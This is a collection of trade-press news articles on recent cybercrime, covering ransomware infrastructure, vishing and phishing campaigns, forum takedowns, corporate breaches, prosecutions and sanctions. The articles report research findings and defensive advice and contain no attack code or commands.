Huntress recommends the use of multi-factor authentication (MFA) on all remote access services, administrative accounts, and external-facing applications and adopting the principle of least privilege.

Networks should be logically separated to prevent lateral movement and all external-facing applications and devices - especially VPN and RDP gateways - should be patched immediately and monitored for anomalous login attempts.

Similarly, third-party software should be regularly audited, with user permissions limited. Elsewhere, Huntress said enterprises should be monitoring for unusual process execution chains and configure alerts for any attempts to modify or disable security software.

Huntress warned these cases highlight a growing trend of threat actors leveraging legitimate, commercially available software to blend into enterprise environments.

"Net Monitor for Employees Professional, while marketed as a workforce monitoring tool, provides capabilities that rival traditional remote access trojans: reverse connections over common ports, process and service name masquerading, built-in shell execution, and the ability to silently deploy via standard Windows installation mechanisms," they wrote.

"When paired with SimpleHelp as a secondary access channel, complete with keyword-based monitoring triggers targeting cryptocurrency activity, the result is a resilient, dual-tool foothold that is difficult to distinguish from legitimate administrative software."

FOLLOW US ON SOCIAL MEDIA

Ransomware gangs are renting cheap virtual machines (VMs) rather than building their own servers, with thousands effectively sharing the same infrastructure.

Analysis from Sophos found criminals are leasing VMs from bulletproof hosting (BPH) services like MasterRDP, exploiting legitimate ISPsystem infrastructure.

The advantage of this strategy is that it allows hackers to scale operations, remain anonymous, and keep activities running. Even if one server is taken down, hundreds just like it still exist.

Sophos uncovered the practice while investigating multiple WantToCry ransomware incidents. It found that the attacker servers all had the same autogenerated Windows hostnames, which kept popping up across incidents and multiple countries.

The team found more than 7,000 servers in the wild sharing a single hostname, many of which appeared to originate from Russia, Europe, the US, and even Iran and Israel.

"Based on CTU and third-party observations, the two hostnames used in the WantToCry ransomware activity (WIN-J9D866ESIJ2 and WIN-LIVFRVQFMKO) have been used in multiple incidents," the Sophos Counter Threat Unit Research Team said.

"This malicious activity includes cybercriminal attacks involving LockBit, Qilin, and BlackCat (also known as ALPHV) ransomware, and an additional deployment of NetSupport RAT."

This infrastructure is commonly used to support ransomware command and control (C2) servers, malware distribution, phishing campaigns, botnet management, and data exfiltration staging.

The practice appears to have been going on for at least five years, researchers noted.

Cheaper attacks, but easier to track

Crucially, the use of reused VM hostnames is enabling security researchers to track activities more effectively, with thousands of ISPsystem VMs sharing static hostnames, many linked to ransomware and malware campaigns.

Most affected VMs are hosted by a small set of providers, some of which are tied to state-sponsored hacker or cyber criminal activity.

"While there is likely to be some legitimate activity originating from virtual machines with these hostnames from these hosting providers, there is additional data that links the top two providers (Stark Industries Solutions Ltd and First Server Limited) to cybercriminal and Russian state-sponsored operations," the researchers said.

"CTU and third-party researchers have observed multiple state-sponsored and cybercriminal threat groups use Stark Industries Solutions Ltd infrastructure since its founding in February 2022, just before Russia’s invasion of Ukraine."

Cyber crime infrastructure takedowns continue

In May last year, the European Council issued “restrictive measures” against Stark Industries Solutions and its operators for enabling various Russian state-sponsored and affiliated actors to conduct destabilizing activities.

Meanwhile, First Server Limited appears to be closely connected to Doppelganger, a Russian disinformation campaign whose operators and associated entities were sanctioned by the UK government in October 2024.

Sophos said it’s highly likely that MasterRDP is just one of many BPH providers leasing ISPsystem virtual machines hosted on abuse-tolerant infrastructure to customers with malicious intentions, including those engaged in ransomware operations and malware delivery.

"ISPsystem VMmanager is a legitimate commercial virtualization management platform widely used across the hosting industry, and the software itself is not malicious," researchers said.

"However, its low cost, low barrier to entry, and turnkey deployment capabilities make it attractive to cybercriminals while its widespread legitimate use provides operational cover among thousands of compliant deployments."

FOLLOW US ON SOCIAL MEDIA

Google Threat Intelligence Group (GTIG) has identified a group with all the hallmarks of ShinyHunters using voice phishing (vishing) and fake credential harvesting websites to steal sensitive data.

In an advisory, the tech giant warned the group primarily gains access to corporate environments by obtaining single sign-on (SSO) credentials and multi-factor authentication (MFA) codes.

Once inside, the attackers target cloud-based SaaS applications to exfiltrate sensitive data and internal communications that they can use in subsequent extortion demands.

Google is currently tracking the activity under several threat clusters, including UNC6661, UNC6671, and UNC6240.

Last month, for example, UNC6661 pretended to be IT staff and called employees at targeted organisations, claiming that the company was updating MFA settings.

The threat actor then directed employees to victim-branded credential harvesting sites to capture credentials and MFA codes, with victims thereafter registering their own device for MFA.

According to Google, threat actors moved laterally through victim customer environments to exfiltrate data from various SaaS platforms.

While the attacks are targeted, analysis suggests that subsequent access is probably opportunistic, determined by the specific permissions and applications accessible via the individual compromised SSO session. Google stressed that the activity isn't the result of a security vulnerability in vendors' products or infrastructure.

"In some cases, they have appeared to target specific types of information. For example, the threat actors have conducted searches in cloud applications for documents containing specific text including 'poc', 'confidential', 'internal', 'proposal', 'salesforce', and 'vpn' or targeted personally identifiable information (PII) stored in Salesforce," researchers said.

"Additionally, UNC6661 may have targeted Slack data at some victims' environments, based on a claim made in a ShinyHunters-branded data leak site (DLS) entry."

Valuable intelligence

Cory Michal, CSO at AppOmni, praised the level of operational detail in the report, and particularly the volume and specificity of indicators of compromise that weren’t previously public.

This intelligence could prove vital for organizations that find themselves in the crosshairs moving forward, Michael noted.

“Publishing concrete domains, tooling names/artifacts, and workflow-level signals gives defenders something they can deploy immediately at scale (email/web filtering, OAuth/app controls, identity telemetry detections, and retro-hunting),” he said.

“It helps the ecosystem disrupt infrastructure and tradecraft faster by enabling consistent blocking and takedown actions across many organizations rather than each team rediscovering the same indicators in isolation.”

What can enterprises do to protect themselves?

Google has published guidance on hardening, logging, and detection against the threats.

Organizations responding to an active incident should focus on rapid containment steps, such as severing access to infrastructure environments, SaaS platforms, and the specific identity stores typically used for lateral movement and persistence.

Long-term defense, meanwhile, requires a transition toward phishing-resistant MFA, such as FIDO2 security keys or passkeys, which are more resistant to social engineering than push-based or SMS authentication.

“Companies should treat this as both a hunt and prevent problem: First, take the IoCs in the report and run them through your detection-and-response workflows (SIEM/SOAR, email security, web proxy/DNS, EDR, and SaaS audit logs) to identify any historical or active exposure," Michal added.

Michael added they should add continuous monitoring for look-alike domain registrations that incorporate their company name or common brands that they use for login, support, and HR.

"In many of these campaigns, those newly registered domains are a leading indicator, they show up before the first vishing call, so catching and blocking them early (and tightening your help desk/MFA enrollment controls in parallel) can meaningfully reduce the chance the intrusion ever gets to the “mass download and extortion” stage,” he said.

FOLLOW US ON SOCIAL MEDIA

The FBI has seized the clearnet and dark web domains of the RAMP underground hacking forum, used by Ransomware as a Service (RaaS) gangs and other cyber criminals.

While there's no official statement as yet, the domains now display banners reading "The Federal Bureau of Investigation has seized RAMP."

The notice adds that the action was carried out in coordination with the US Attorney's Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice.

The takedown also appears to be confirmed by "Stallman", said to be one of RAMP's owners, in an XSS hacking forum post translated from Russian and shared on X.

"With regret, I inform you that law enforcement agencies have gained control over the Ramp forum," it reads.

"Despite the fact that I no longer control Ramp and will not be creating a new forum from scratch, I will continue to buy accesses,” the statement adds. “My core business remains unchanged. If you have something you can offer me, the terms are listed in my signature, message me in private messages, and we will exchange via Jabber/Tox."

What you need to know about RAMP

RAMP - which originally stood for Russian Anonymous Marketplace - was a highly popular dark web forum that catered mainly for Russian-speaking cyber criminals, including RaaS gangs and initial access brokers.

It billed itself as the “only place ransomware allowed", and ransomware groups including Qilin, LockBit, DragonForce, RansomHub, and ALPHV/BlackCat promoted their RaaS services there.

The site also included discussion groups and cyber attack tutorials.

"The reason for its success was that it offered criminals a marketplace supporting the entire attack chain, from the ability to buy stolen credentials, promote malware or sell and purchase ransomware services," said Ben Clarke, SOC manager at CybaVerse.

Will the takedown stick?

Clarke added that while the takedown will affect criminal activity for a while, the long-term impact could be minimal.

"Anything to disrupt this activity is a positive step for defenders. But we would be naive to believe it will a tangible impact on cyber crime," he said. "New marketplaces will be formed to take RAMP’s place, while threat actors will navigate to other platforms to buy and sell services."

Law enforcement takedowns in recent years have achieved mixed results. While they do disrupt operations, forums are often revived, as with the Emotet botnet takedown in 2022. In this instance, the botnet returned with a vengeance.

This doesn't mean that these operations are futile, however. Daniel Wilcock, threat intelligence analyst at Talion, said takedowns are still a key tactic for law enforcement to stifle cyber criminal activities and gain vital intelligence.

"While this doesn't signal the end of ransomware, law enforcement will be able to gain valuable information from the seizure around the threat actors using the services, such as their emails and IP addresses plus access to the financial transactions that took place on the market," he said.

"This could support further law enforcement action against the threat actors that used the site, but given that RAMP was heavily used by Russian criminals it's highly unlikely we will see many actual arrests."

FOLLOW US ON SOCIAL MEDIA

Nike has confirmed it is investigating a potential data breach amidst claims hackers have accessed sensitive company data.

Hackers behind the WorldLeaks ransomware group claim to have accessed up to 1.4TB of internal data, adding the company to its leak site.

Exact details on the data stolen by the group are yet to be revealed. However, a sample published by the group points toward design and manufacturing information.

Data shared by WorldLeaks includes directories titled “Women’s Sportswear” and “Training Resources - Factory”, for example.

At present, it does not appear that sensitive customer or employee data was compromised in the attack.

In a statement given to Infosecurity Magazine, a spokesperson for Nike said: “We always take consumer privacy and data security very seriously. We are investigating a potential cybersecurity incident and are actively assessing the situation.”

ITPro has approached Nike for additional comment and clarification.

Nike data breach could have ramifications

Initial analysis of the data dump from threat intelligence group, Justabreach, suggests the data stolen by WorldLeaks dates as far back as 2020.

While no customer data appears to have been compromised thus far, the long-term damage of this attack could be significant for the sportswear giant.

Sensitive documents on manufacturing processes and product information have been impacted.

Shankar Haridas, head of UKI at ManageEngine, said this could have huge ramifications for the company.

“For large brands, the risk rarely stops at customer records,” he said.

“Product roadmaps, supplier contracts, pricing models, and internal comms are often just as valuable to attackers. A leak of this scale can create long-term competitive and reputational damage, even before the facts are fully confirmed.”

What you need to know about WorldLeaks

WorldLeaks has claimed a number of victims in recent years, including Dell and Tata Technologies, and is believed to be the successor group to Hunters International.

The notorious threat group confirmed plans to shut down in July last year, offering victims a decryptor to regain access to stolen data. The announcement wasn’t quite a goodwill gesture, however.

Speaking to ITPro at the time, Dray Agha, senior manager of security operations at Huntress, said the group was essentially just rebranding under a new name.

David Sancho, senior threat researcher at Trend Micro, said the attack against Nike follows a dormant period for the group, which now appears to have large corporations in its crosshairs once again.

“There’s no question that World Leaks is going after large companies,” he said. “Nike is the latest and follows a ‘quiet period’ between the last observed Hunters International attack (last July) and the first attack after the group rebranded as “World Leaks” (last September).”

Sancho noted that the “standout trait” of WorldLeaks is that it’s a data exfiltration group, meaning it focuses primarily on stealing data, then asking for money in exchange for not leaking it to the public.

“This stands in contrast with the traditional ransomware strategy of encrypting the data and asking for payment in order to decrypt it.”

FOLLOW US ON SOCIAL MEDIA

For years, it felt like we were slowly but surely gaining ground in an uphill battle against ransomware. Attack numbers were cooling off, organizations were getting smarter, and defensive tools were maturing.

But, for the first time in years, the momentum has shifted, and not for the better. Researchers are ringing the alarm: ransomware is climbing again, attacks are getting smarter, and adversaries are adopting artificial intelligence (AI)I faster than many defenders can keep up.

For channel partners and Managed Service Providers (MSPs), this isn’t just another moment in the news cycle. It’s also an opportunity to educate their customers and provide them with the solutions they need to combat cyber threats more effectively.

Ransomware’s quiet comeback

What’s striking about the latest wave isn’t just the increase in the volume of activity, but how rapidly attackers have evolved. Ransomware groups have regrouped, retooled, and are now operating with a new level of sophistication that we have never seen before in cybersecurity.

Attackers are leaning heavily on automation, AI-generated phishing, and coordinated extortion operations. Phishing appears to have re-emerged as the most reliable doorway in, not because people are less cautious, but because the lures are now much more difficult to distinguish from legitimate communication. AI has given cybercriminals a frightening edge: scale and believability.

The new attack playbook

Phishing remains the most reliable and familiar workhorse for most ransomware crews, but that’s only part of the story. Stolen credentials, session hijacking, and compromised endpoints are playing a bigger role than in previous years.

Ultimately, attackers have concluded that targeting identity and access management tools often yields a far higher payout than hammering at technical vulnerabilities.

Many of these techniques are now automated, meaning small businesses, especially those relying on outdated filtering or inconsistent endpoint practices, are increasingly caught in the crosshairs.

Organizations are clearly hungry for modern defenses to meet these modern challenges, but they often don’t know where to start. Right now, MSPs have an opening to step up their game by offering their customers more advanced identity protection, AI-enhanced email security, and automated phishing-resistance training that puts them ahead of the curve.

The cyber insurance safety net is fraying

Organizations sometimes assume cyber insurance will save them when the worst happens, or that it cuts back on the need for other forms of protection. But that assumption is incorrect.

Recent insights highlight a common theme: policies are getting stricter, premiums are climbing, and insurers are pushing back on payouts when the right controls aren’t in place.

This shift means companies can’t “insure their way out” of ransomware. MSPs are increasingly being asked to help customers weigh the cost-benefit of insurance versus strengthening resilience, and, in many cases, proactive security investments win out. The fact is that companies are increasingly unlikely to qualify for cyber insurance if they do not have robust cybersecurity systems.

Recovery is improving, but not fast enough

Don’t despair: there is some good news. With a few years of experience under their belts, organizations are getting better at detecting and containing attacks quickly. More companies now have dependable and immutable backups, disaster-recovery playbooks, and the confidence to avoid paying ransoms.

But the human side of security hasn’t kept up the pace the way that it needs to. Leaders still underestimate how much risk comes from everyday behaviors. An employee who approves a fake MFA request, a manager who reuses passwords, or an intern who clicks a well-disguised link can set into motion a domino effect of consequences with massive ramifications.

In many cases, training programs exist, but they’re ineffective or outdated. “Check-the-box” security awareness simply can’t compete with AI-powered attacks designed to mimic real people.

This is where MSPs can have an outsized impact, by offering cyber awareness training that’s automated, personalized, ongoing, and tied to tangible threats happening in real time.

Even with the most sophisticated firewalls, human error has a way of resurfacing as the most common source of breaches. In this scenario, expertise and cyber-resilience are more valuable than ever, and MSPs are in a great position to offer access to this.

What this all means for MSPs and channel partners

We’re entering a different era of ransomware in which the quantity and quality of attacks are no longer mutually exclusive. Hackers are creating traps that are more convincing than ever, and they’re doing it at scale.

But it’s also an era where MSPs have more tools, intelligence, and AI capabilities at their disposal to help customers build real resilience. So, what can you do?

For one, MSPs can focus on offering clients expertise in addition to next-gen tools. Providing integrated protection can help to solidify a business’s reputation as a trusted guide in precarious times.

It also falls on MSPs to help client organizations understand what “good security” really looks like beyond the safety blanket of insurance.

Finally, it is up to the MSP to make the most of AI-powered tools and take advantage of their capabilities to detect, prevent, and respond to threats faster than ever.

The resurgence of ransomware isn’t a sign that cybersecurity is failing, only that the threat landscape has shifted. And channel partners who help customers adapt to this new reality have an opportunity not only to better protect their clients, but to establish themselves as authorities in this new domain.

Group-IB is warning of a dangerous new DeadLock ransomware family based on the abuse of Polygon smart contracts.

A smart contract is a self-executing program stored on a blockchain that automatically enforces predefined rules or agreements without intermediaries.

DeadLock works through the stealthy usage of Polygon smart contracts for proxy address storage. This, Group-IB analysts warned, is a poorly-documented and under-reported technique that they've seen increasingly being used in the wild.

There are numerous variants currently in use, which allows threat actors to bypass traditional defenses by abusing decentralized blockchains worldwide.

"This exploit of smart contracts to deliver proxy addresses is an interesting method where attackers can literally apply infinite variants of this technique; imagination is the limit," the researchers said.

DeadLock, first discovered in July 2025, is unusual in not being associated with any known affiliate programs and for lacking a data leak site. This, combined with the limited number of reported victims, means it's largely flown under the radar.

"However, Group-IB specialists have discovered an interesting use of Polygon smart contracts for proxy server address rotation or distribution," the researchers said.

"This finding warrants public attention, especially since the abuse of this specific blockchain for malicious purposes has not been widely reported."

How DeadLock operates

The initial access vector and other important stages of the attacks remain unknown, according to Group-IB, although toolset analysis reveals the use of Anydesk as a remote monitoring and management tool.

DeadLock then deletes several services on the victim’s machine, along with shadow copies to maximize impact.

The attackers set the file extension of all the encrypted files to .dlock, change file icons and take over the victim’s wallpaper, telling the victim to open the ransom note and follow the instructions. The main targets, Group-IB revealed, are in Italy, Spain, and India.

"DeadLock seems to have reactivated its operations by recently setting up a new proxy server, the researchers warn. "Although it’s low profile and yet low impact, it applies innovative methods that showcases an evolving skillset which might become dangerous if organizations do not take this emerging threat seriously."

Smart contracts are becoming an increasing target for cyber criminals, with Google warning last autumn that the North Korean threat actor UNC5342 was using a technique dubbed “EtherHiding” to deliver malware and facilitate cryptocurrency theft.

This consists of leveraging transactions on public blockchains to store and retrieve malicious payloads. According to research from Google, this is highly resilient against conventional takedown and blocklisting efforts.

Around the same time, two new pieces of open source malware were uncovered on the npm package repository by ReversingLabs researchers, exploiting smart contracts for the Ethereum blockchain to load malware on compromised devices.

FOLLOW US ON SOCIAL MEDIA

A cyber criminal is claiming to have seized data from Florida-based engineering firm Pickett and Associates relating to three US utilities.

Pickett provides transmission and distribution power line design, aerial surveying, and LiDAR services to major utilities and mining firms across the US and the Caribbean.

The hacker in question is now offering around 139 GB of engineering data - 892 files - about Tampa Electric Company, Duke Energy Florida, and American Electric Power on a dark web forum.

There's an asking price of 6.5 bitcoin, or a little under $600,000.

The data is claimed to include more than 800 classified raw LiDAR point cloud files in .las format, ranging from 100 MB to 2 GB in size, along with full coverage of transmission line corridors and substations, including layers for bare earth, vegetation, conductors, and structure.

Also apparently up for sale are high-resolution orthophotos in .ecw format, microStation design files and PTC settings, large vegetation feature files in .xyz format and preserved folder structures from active projects.

"This dataset contains real, operational engineering data from active projects of major utilities and is suitable for infrastructure analysis, modelling, risk assessment of specialized research," the hacker said.

Tampa Electric Company has around 860,000 business and residential customers in West Central Florida, while Duke Energy Florida has about two million. American Electric Power, meanwhile, boasts nearly 5.6 million customers across 11 states.

ITPro approached Pickett and Associates for comment, but did not receive a response by time of publication.

German solar company data up for grabs

The same criminal is also offering what's claimed to be an internal database belonging to Hamburg, Germany-based solar energy firm Enerparc AG. The data is claimed to include information about solar projects in Spain’s Mallorca and Alicante regions.

According to research from Sophos, 67% of energy, oil or gas and utilities firms suffered a ransomware attack in 2024, up from 55% in 2020.

This time last year, TrustWave said that ransomware attacks targeting the energy and utilities sectors rose by 80% in 2024.

Energy firms are frequently targeted by hacktivists and nation state actors including Russia, China, Iran and North Korea, with China's Volt Typhoon hitting a number of power utilities in 2023.

All in all, US critical infrastructure operators reported almost 4,900 cybersecurity threats in 2024.

Critical industries in the crosshairs

According to recent research from security firm Kela, global ransomware attacks against critical industries rose by 34% in 2025.

The US was the most-affected country, accounting for 21% of global incidents, followed by Canada, Germany, the UK, and Italy.

"In critical industries, such disruptions can have national-level consequences, undermining essential operations and eroding public trust," commented Lin Levi, Kela threat intelligence team lead.

"To protect critical services, governments and critical industry sectors must prioritize proactive preventative measures and maintain continuous real-time monitoring to detect and respond to cyber threats."

FOLLOW US ON SOCIAL MEDIA

Two US cybersecurity experts have pleaded guilty to using ALPHV BlackCat ransomware to extort businesses across the USA during a seven-month campaign in 2023.

40-year-old Ryan Goldberg of Georgia and 36-year-old Kevin Martin of Texas, admitted conspiring to obstruct, delay, or affect commerce through extortion in a federal district court in the Southern District of Florida.

Goldberg was an incident response manager at the time he and Martin, as well as one other unnamed individual, turned their skills to nefarious activities. Martin, meanwhile, was a ransomware threat negotiator.

Their campaign, which ran from April to December 2023, saw the trio turn to ALPHV BlackCat ransomware as a service operators, who they agreed to pay 20% share of any ransoms received in exchange for access to the ransomware and extortion platform

They then successfully used the malware against numerous US targets, including a pharmaceutical company based in Maryland, an engineering company based in California, a drone manufacturer in Virginia, and a medical company from Florida, where the case was heard.

One victim paid the equivalent of $1.2 million in Bitcoin in order to put an end to the attack, with the proceeds split three ways between the conspirators after they had given the ALPHV BlackCat administrators their cut.

Assistant attorney general A. Tysen Duva of the Justice Department’s Criminal Division said: “These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop.”

Millions of dollars saved following ransomware disruption

ALPHV BlackCat was active for 18 months before the FBI developed a decryption tool for the ransomware, extorting millions of dollars from businesses primarily in the US before going dark in December 2023. The law enforcement agency estimates it saved victims in the order of $99 million in ransomware payments.

“The FBI remains committed to working alongside its law enforcement partners to disrupt and dismantle criminal enterprises involved in ransomware attacks and to hold accountable not only the perpetrators but also anyone who knowingly enables or profits from them,” said special agent in charge Brett Skiles of the FBI Miami Field Office.

US attorney Jason A Reding Quiñones, representing the Southern District of Florida, said: “Goldberg and Martin used trusted access and technical skill to extort American victims and profit from digital coercion.”

“Their guilty pleas make clear that cybercriminals operating from within the United States will be found, prosecuted, and held to account,” he added.

The pair are set to be sentenced on 12 March 2026 and face a maximum penalty of 20 years in prison.

Security researcher Brian Krebs has unmasked one of the apparent culprits behind the Jaguar Land Rover and M&S cyber attacks as a Jordanian teenager.

Krebs approached the 15-year-old, who had been using the pseudonym ‘Rey’ on Telegram and confirmed his real identity.

The teenager said he has been in contact with various international law enforcement agencies, such as Europol, and hasn’t carried out any hacking activities since September.

“I’m already cooperating with law enforcement,” he said. “In fact, I have been talking to them since at least June,” he told Krebs.

Krebs noted that he was unable to confirm these details following contact with the individual.

Scattered LAPSUS$ Hunters, of which 'Rey' is just one of three administrators, has been behind numerous extortion attempts. According to Krebs, he was previously an administrator of the data leak website for Hellcat, a ransomware group involved in attacks on Schneider Electric, Telefonica, and Orange Romania.

The teenager was also an administrator of the latest incarnation of English-language leak site, BreachForums.

While cyber crime groups like this are often portrayed as being part of organized crime, 'Rey' is one of a growing number of hackers who turn out to be normal teenagers.

How Krebs snared ‘Rey’

According to Krebs, a series of mistakes enabled him to track him down. While operating under the Telegram username @wristmug, Rey accidentally revealed his password in a screenshot - a password that Krebs was able to link to the email address cybero5tdev@proton.me.

Data from Spycloud then indicated that Rey’s computer was a shared Microsoft Windows device located in Amman, Jordan, and also used by other family members.

It's not clear what will happen now. But, Alon Gal, co-founder and CTO at Hudson Rock questioned why “no apparent action” had been taken by law enforcement.

“Rey is one of the most prolific threat actors of the past few years,” he wrote in a post on LinkedIn. “I genuinely don’t understand how they let him continue if the dox proves to be accurate."

In any case, Rey told Krebs: "I don’t really care, I just want to move on from all this stuff even if its going to be prison time or whatever they gonna say.”

The rise of teen hackers

It's not unusual for hackers - especially in the various groups associated with Scattered Spider - to turn out to be extremely young. In September, for example, 19-year-old Thalha Jubair and Owen Flowers, 18, were charged in the UK for their involvement in an attack on TfL last year.

Speaking to ITPro at the time, security experts said the uptick in youth-related cyber crime is a serious cause for concern and requires swift action from industry, academia, and law enforcement.

Anna Chung, principal researcher for EMEA at Palo Alto Networks, said the trend should be a “wake up call” for authorities and called for efforts to encourage tech-savvy teens toward legitimate careers in cybersecurity.

According to the UK's Information Commissioner’s Office (ICO), the biggest cybersecurity risk faced by schools comes from the pupils themselves, with around 5% of all 14-year-old boys and girls admitting to ‘hacking’ in some capacity.

William Wright, CEO of Closed Door Security, said the group boasts close ties to Russian threat actors, which has enabled it to wreak widespread havoc.

"There will be a lot of concern among the general public around how a 15-year-old could cause so much damage to some of the biggest organisations in the UK. But in reality, it's not so simple. Rey was collaborating with Russian threat actors, using their infrastructure to execute highly sophisticated attacks," he said.

"Rey claims to be working with law enforcement now, which is causing trouble across the Scattered Lapsus$ Hunter Telegram channel. This could lead to other members of the gang being identified, but Rey may get off lightly if he supports law enforcement enough."

MORE FROM ITPRO

• Former NCSC head says the Jaguar Land Rover attack was the 'single most financially damaging cyber event ever to hit the UK'
• M&S reveals massive financial hit from cyber attack
• Hackers behind Jaguar Land Rover announce their 'retirement' – should we believe them?

The Scattered Lapsus$ Hunters threat group appears to be targeting Zendesk users in a new phishing campaign, according to analysis from ReliaQuest.

The security firm said it has spotted Zendesk-related infrastructure, including more than 40 typosquatted domains and URLs impersonating the company, created over the last six months.

These domains aim to mimic organizations’ Zendesk environments and host phishing pages, researchers warned.

"These domains, such as znedesk[.]com or vpn-zendesk[.]com, are clearly designed to mimic legitimate Zendesk environments. Some host phishing pages, like fake single sign-on (SSO) portals that appear before Zendesk authentication," said ReliaQuest.

"It’s a classic tactic probably aimed at stealing credentials from unsuspecting users. We also identified Zendesk-related impersonating domains that contained multiple different organizations’ names or brands within the URL, making it even more likely that unsuspecting users would trust and click on these links."

The domains shared several registry details: registration through NiceNic, US and UK registrant contact information, and Cloudflare-masked nameservers.

"These elements are reminiscent of the recent Scattered Lapsus$ Hunters campaign that targeted customer relationship management platform Salesforce in August 2025," ReliaQuest said.

"The domains we uncovered while investigating the August campaign shared similarities with the Zendesk domains: formatting, registry characteristics, and the use of deceptive SSO portals."

Be wary of fraudulent Zendesk tickets

Meanwhile, ReliaQuest said it has observed fraudulent tickets being submitted to legitimate Zendesk portals operated by organizations using the software for customer service.

Pretexts include urgent system administration requests or fake password reset inquiries, and the aim is to infect support and help-desk personnel with remote access trojans (RATs) and other forms of malware.

In September, Scattered Lapsus$ Hunters targeted the communication platform Discord, accessing its Zendesk-based support system and exfiltrating a large number of names, email addresses, billing information, IP addresses, and government-issued IDs.

A message posted on a Telegram channel associated with the group in November claimed: "Wait for 2026, we are running 3-4 campaigns atm."

Another read: "all the IR (incident response) people should be at work watching their logs during the upcoming holidays till January 2026 bcuz #ShinyHuntazz is coming to collect your customer databases."

ReliaQuest said organizations should handle customer support platforms with the same level of security as their own core infrastructure.

"ReliaQuest anticipates that SLSH, or copycat threat actors, will likely continue abusing Zendesk and similar customer support platforms — typically monitored less rigorously than inbound email traffic — to access downstream customers' sensitive data and credentials," said the firm.

"These platforms now warrant equivalent security controls to core infrastructure, particularly since SLSH operates multiple, concurrent attack paths, i.e. external phishing domains coupled with internal ticket injection."

MORE FROM ITPRO

• If you're not taking insider threats seriously, then the CrowdStrike incident should be a big wake up call
• Scattered Spider: Who are the alleged hackers behind the M&S cyber attack?
• Hackers behind Jaguar Land Rover announce their 'retirement' – should we believe them?

Japanese brewing giant Asahi has revealed that a cyber attack in September saw personal information belonging to 1.5 million customers exposed.

The incident, discovered on 29 September, saw an attacker gain unauthorized access to the firm's data center network via network equipment at its headquarters.

"Ransomware was deployed simultaneously, encrypting data on multiple active servers and some PC devices connected to the network," said Asahi in an update.

"While investigating the extent and details of the impact, focusing on the systems targeted in the attack, we identified that some data from company-issued PCs provided to employees had been exposed."

The company said there was no evidence that the data had been published on the internet, and that the attack was limited to systems managed in Japan.

Customers affected in the incident are those who had contacted the customer service centers of Asahi Breweries, Asahi Soft Drinks, and Asahi Group Foods, with names, gender, addresses, phone numbers, and email addresses exposed.

Meanwhile, the names, addresses and phone numbers of external contacts to whom the company had sent congratulatory or condolence telegrams were accessed.

Employee details were also exposed in the breach, Asahi confirmed, with information including names, dates of birth, addresses, phone numbers, and email addresses impacted along with the names, dates of birth, and gender of some family members.

Asahi cyber attack recovery still ongoing

The company said it continues to restore systems on a phased basis, is redesigning communication routes and network controls, and tightening connection restrictions.

It's also limiting connections to external parties via the internet – including email and web applications – to secure zones and improving security monitoring systems.

Backup strategies and BCP plans will be redesigned and updated to ensure rapid recovery in the event of an emergency, the firm said, while security standards will be continuously reviewed.

“I would like to sincerely apologize for any difficulties caused to our stakeholders by the recent system disruption. We are making every effort to achieve full system restoration as quickly as possible, while implementing measures to prevent recurrence and strengthening information security across the group, " said Atsushi Katsuki, president and group CEO.

"Regarding product supply, shipments are resuming in stages as system recovery progresses. We apologize for the continued inconvenience and appreciate your understanding.”

Who was behind the attack?

At a press conference in Tokyo this week, Katsuki said the company hadn't communicated with the attacker and hadn't paid any ransom.

"Even if we had a ransom demand, we would not have paid it," he said.

The attack has been claimed by the Qilin ransomware group, which has listed Asahi on its data leak site.

The group claims it exfiltrated 27GB of files from the company, including financial documents, budgets and contracts, along with the personal data of employees, as well as plans and development forecasts of the company.

In a recent report, Guidepoint said the Russia-linked group was now the world's leading ransomware gang, with its activity surging 318% year-over-year during the last quarter, and claiming 234 victims.

The group has claimed responsibility for attacks on manufacturers, financial firms, retailers, government and healthcare providers, including London hospitals.

“The Asahi ransomware attack is a powerful reminder that the fallout from a cyber breach can stretch far beyond the initial incident," said Chris Dimitriadis, chief global strategy officer at ISACA. 

"Months later, it’s been revealed that 1.5 million customers potentially had their data breached, and the company has been forced to delay its financial results. This is clear evidence that the damage from ransomware attacks can be deep, expensive and long-lasting." 

Dimitriadis added: “While we’ve seen more of these large-scale attacks in 2025, we cannot afford to become desensitised to them. With AI now enabling criminals to hack at the speed of intent, the job of defending against attacks is even more critical. The window to detect and stop an attack is shrinking."  

MORE FROM ITPRO

• Shai-Hulud malware is back with a vengeance and has hit more than 19,000 GitHub repositories so far
• Cyber insurance payouts are skyrocketing
• If you're not taking insider threats seriously, then the CrowdStrike incident should be a big wake up call

The UK, US, and Australia have imposed sanctions on a Russian cyber crime group offering so-called 'bulletproof' hosting services for hackers worldwide.

Media Land provides online infrastructure to support ransomware and phishing operations, and is believed to have played a key role in a spate of devastating cyber attacks in recent years.

Ransomware victims of the outfit include UK critical national infrastructure organizations and it's also been used for malware and phishing campaigns targeting UK taxpayers.

In the US, Media Land infrastructure has been used in distributed denial of service (DDoS) attacks against companies and critical infrastructure. Meanwhile, in Australia, the group has helped criminals to carry out attacks against financial institutions, businesses, their customers, and critical infrastructure.

"Cyber criminals think that they can act in the shadows, targeting hard working British people and ruining livelihoods with impunity," said UK foreign secretary Yvette Cooper.

"But they are mistaken – together with our allies, we are exposing their dark networks and going after those responsible."

The measures target Media Land’s ringleader, Alexander Volosovik, also known as Yalishanda, who has been active since at least 2010 and is known to have worked with some of the most notorious cyber criminal groups, including Evil Corp, LockBit, and Black Basta.

Also sanctioned is Kirill Zatolokin, a Media Land employee responsible for collecting payment from customers and coordinating with other cyber actors, as well as Yulia Pankova, who has helped Volosovik with legal issues and handled his finances.

Sanctions target Media Land sister outfits

The sanctions also target ML Cloud, a Media Land sister company whose technical infrastructure is often used in conjunction with Media Land, including in ransomware and DDoS attacks.

Hypercore, a UK company registered and utilized by Aeza Group, has also been targeted in the international campaign.

The sanctions block access to any assets held in the sanctioning countries, and bar businesses and individuals there from engaging with the listed entities or people. Financial institutions that violate these restrictions can face penalties themselves.

"These sanctions don’t just impose costs on criminals, they dismantle the infrastructure that enables cyber crime," said Australian deputy prime minister Richard Marles.

"By disrupting these networks, we make it harder for others to launch attacks and it strengthens Australia’s resilience against future threats."

Will the sanctions work?

The move marks the latest in a string of actions by governments to crack down on cyber crime-related hosting services.

In July this year, the US Treasury announced plans to impose sanctions on Azea Group, another bulletproof hosting service for its activities. US officials revealed the group has been selling access to specialized services and infrastructure used in a series of ransomware and infostealer malware campaigns.

While this fresh crackdown has been welcomed by security industry stakeholders, John Binns, partner and head of the sanctions practice at BCL Solicitors, said these typically have a limited effect.

